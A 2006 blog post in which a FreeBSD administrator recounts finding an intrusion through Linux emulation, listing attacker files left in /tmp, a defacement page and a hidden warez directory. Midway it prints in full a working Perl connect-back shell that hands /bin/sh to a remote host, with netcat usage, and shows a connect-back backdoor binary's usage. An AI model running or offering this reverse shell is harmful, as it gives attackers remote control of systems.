Hacking FreeBSD - The Easy way
Monday, March 6, 2006 11:42:37 AM
linux_enable="YES"Set this to "NO" if you have this line. I noticed the "hack" when I realized that /tmp was a bit big:
bash-2.05b# du -sh /tmp 11G /tmp bash-2.05b#Then I have found the file "shell" in /tmp:
bash-2.05b# file /tmp/shell /tmp/shell: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped bash-2.05b#Keep in mind that we are still talking about a freebsd. I tried executing this file and it works. My firewall setup was secure in my point of view. I blocked everything but made some exceptions. So I passed http and ftp over an ftp-proxy shipped with freebsd. Nothing else... SSH was only allowed from specific IP's. My home IP and the IP at work. After the detection of that "shell" binary, I disabled linux_enable and began to search for other exploits and I found something. The next thing I found was the following script:
#!/usr/bin/perl # # A perl based connect back shell # # usage: # # $netcat -l -s 127.0.0.1 -p 10001 # $./cbs.pl 127.0.0.1 10001 # # firstname.lastname@example.org # use Socket; $execute= 'echo "`uname -a`";echo "`id`";/bin/sh'; $target=$ARGV; $port=$ARGV; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($execute); close(STDIN); close(STDOUT);clever and sad fpr me... Next file I found is "dc" in /tmp:
bash-2.05b# file dc dc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped bash-2.05b# ./dc Data Cha0s Connect Back Backdoor Usage: ./dc [Host] <port> bash-2.05b#Ok, no comment... Next file found is "index.php" in /tmp:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title></title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <div align="center"><img src="top.jpg" width="500" height="375"> <br> <font size="2" face="Tahoma"><strong><br> illusion boys iáááááá<br> a força está conosco :)<br> <br> <font color="#FF3399">filhote e lord_devil ;***</font></strong></font></div> </body> </html>*phew. I have still 11G in /tmp, so I searched the big location:
bash-2.05b# du -sh .sess_f5854f3eee756bad71306289160389JJ 11G .sess_f5854f3eee756bad71306289160389JJ bash-2.05b#I got it!
bash-2.05b# ls .sess_f5854f3eee756bad71306289160389JJ Benny.And.Joon-(Johnny_Deep).DvdRip.[By.Caly-AsTrA].avi LULA.3D-DEViANCE.rar mybot.state Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD1.avi RAINBOW.SIX.LOCKDOWN-DEViANCE.rar mybot.state~ Casanova.2005.iTALiAN.MD.TC.XviD-SiLENT.CD2.avi WINTER.CHALLENGE-DEViANCE.rar xh Duma.2005.XviD-ITALiAN.DVDRIP.DeLuXe.avi Winning_Eleven_9_International_Usa_PS2DVD-GAMEOVER.rar Infodll.state httpd bash-2.05b#Cool, warez on my server ! brrr...rm -rf ./* ? No, I will do different things with those files... And another interesting file: "xh":
bash-2.05b# file xh xh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped bash-2.05b#I deleted all that crap, set linux_enable to "NO" and hope that I am happy now .